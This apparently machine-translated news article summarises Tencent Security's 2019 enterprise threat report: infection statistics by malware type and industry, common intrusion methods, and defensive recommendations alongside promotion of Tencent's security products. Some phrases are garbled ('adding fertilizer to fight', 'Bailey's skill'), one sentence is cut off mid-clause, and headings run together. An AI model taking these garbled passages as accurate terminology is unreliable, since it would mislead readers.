In the era of industrial Internet, big data, cloud computing, artificial intelligence and other new technologies accelerate the development of the industry, but also make enterprise network security face more complex challenges. Recently, Tencent security released the report on enterprise security threats in 2019 (hereinafter referred to as the report), which comprehensively analyzed and judged the overall situation of enterprise network security throughout the year, the main types of viruses, virus distribution industry, attack forms, communication means and development trend, and put forward targeted defense plans.
According to the report, among all the targets, the enterprise terminal is still a disaster area of virus infection. In 2019, on average, 40% of the enterprises suffered virus attacks every week, and nearly 80% of the enterprise terminals still have high-risk vulnerabilities that have not been repaired.
Risk Trojan horseInfectedHigh proportionThe Education Sector
Among the terminal risks of enterprises, Trojan software, backdoor and infectious virus are the three major threats faced by enterprises. Among them, the risk Trojan software accounts for the highest proportion of virus attacks. Such virus attackers often obtain a large number of audiences by bundling the downloader and getting the priority display through the competitive ranking of search engine, with a large number of infections, accounting for 44%. Backdoor remote control trojan is followed by 21% of them. Because of its high concealment, receiving remote instructions to carry out information stealing, screenshots, file uploading and other operations, it has caused great harm to information sensitive industries such as financial science and technology.
Among all virus types, mining Trojans are still the main type of Trojans implanted after the enterprise server is captured. In 2019, mining Trojans for Linux platform began to be popular. For example, in September 2019, wannamine, a large-scale mining Botnet, launched an attack against Linux system. The attacker used SSH weak password to blast successfully and then planted the mining Trojan horse, which spread horizontally through the intranet through SSH weak password. Although extortion virus does not account for a high proportion in the event of virus infection, the behaviors such as encrypting data, locking system, extorting more expensive ransom for the value of enterprise data, etc. cause serious losses and great damage to the enterprise, so the enterprise still needs to focus on prevention.
From the perspective of industry, virus attacks have different effects on education, science and technology, medical treatment, finance, government and other industries, among which education industry is the most injured, which is related to the frequent file interactive transmission in education industry. The report shows that among the terminals infected with virus, the proportion of infected virus in education industry is the highest, among which, the proportion of infectious virus in education industry is as high as 57.4%, and the proportion of remote control Trojan horse and extortion virus infecting education industry machine is also more than 50%. Secondly, the government and the technology industry have also become the main targets of virus attacks. In the blackmail virus infection, the government machine accounts for 23% of the infected objects.
The proportion of high-risk vulnerabilities in enterprise terminals is nearly 80%,Malicious mailspreadtool
According to the report, in 2019, vulnerability utilization and port blasting are still important means to capture terminal equipment, especially for attacks against enterprise servers, which attack servers in the public network environment through vulnerability utilization or blasting, and then horizontal penetration of the internal network has become the most commonly used means.
The weak defense deployment of enterprises is an important reason for the success of virus attacks. According to data from Tencent Security Threat Intelligence Center, as of the end of December 2019, 79% of enterprise terminals still have at least one high-risk vulnerability that has not been fixed. At the same time, a large number of enterprise assets still open high-risk ports. In addition to 22, 3389 and other high-risk ports, there are also a large proportion of e-mail services, database services and other ports exposed on the public network, bringing opportunities to the network black production. According to the report, in 2019, about 40% of enterprises had terminal Trojan infection every week.
Remote code execution (RCE), SQL injection, XSS attack and webshell are the most common types of attacks against servers. At the same time, in order to maximize the benefit of its own malicious behavior, intranet communication and persistent resident become the direction of network black production. In the horizontal transmission of the intranet, vulnerability utilization, weak password explosion attack and file sharing become the main means. As for the persistence of virus, it is easy and not easy to be checked and killed by the way of adding shell to confuse, adding fertilizer to fight and staying at the start position of registry or the start folder, which is favored by the black industry; the way of writing itself into the task plan to realize the residence is more hidden and flexible, especially Bailey's skill of remote download is often used in the task plan.
In addition, malicious mail has become a dissemination tool for black production to launch targeted attacks, such as harpoon mail will carefully collect the information of the target object, and then combine with the target object information, make the corresponding subject of mail and content, and defraud the target to run malicious attachments. Tencent's Advanced Security Threat Detection System (Tencent Royalty) has captured a number of similar cases, with attackers carrying elaborately constructed
Build upInformation security lines of defense,To build up before, during and afterWhole process defensesystem
According to the report, extortion virus and mining Trojan continue to spread in 2019, high-risk loopholes and information leakage incidents occur frequently, and the security situation can not be ignored. With the continuous upgrading of security confrontation, network attacks will be further intensified, especially with the development of cloud computing and the popularity of 5g, more and more enterprises will transfer their business to the cloud. The increase of attack surface will make the environment faced by enterprises more complex and the security situation more severe. Therefore, Tencent security experts remind enterprises to pay more attention to network attacks, improve their ability of discovery and active response, and strive to build a stronger information security defense line.
In order to avoid significant impact of network attacks on enterprises, Tencent security experts recommend that enterprise servers close unnecessary ports (such as 135, 139, 445); regularly reinforce servers and repair security vulnerabilities of relevant components of enterprise servers as soon as possible; enforce the use of high-strength passwords through password security policies in enterprise intranet to prevent hackers from brute force cracking; enable special services for key services Industry backup system, and keep multiple backups, remote backup, just in case.
At the same time, Tencent security also creates an overall solution for the current situation of enterprise security. For Enterprise Cloud business, it is recommended to open Tencent cloud security operation center (SOC) to realize the whole process of security management of cloud business, including pre event security prevention, in event threat detection and post event response. For enterprise users who have not yet adopted cloud business, Tencent security operation center (private cloud) can be deployed for centralized security operation.
In addition, Tencent security network asset risk detection system (Tencent Yuzhi) can comprehensively detect whether network assets are affected by security vulnerabilities. Tencent security advanced threat detection system (Tencent Yujie) can detect the risk of hackers' intrusion and penetration attacks on enterprise networks based on network traffic. Tencent security terminal security management system (Yudian) can intercept all kinds of virus Trojan attacks, Tencent's security threat intelligence service can provide the latest threat detection capabilities, and enterprises can enhance their defense capabilities by deploying corresponding security products to prevent accidents before they happen.
Tencent security network asset risk detection system real-time detection of enterprise network asset risk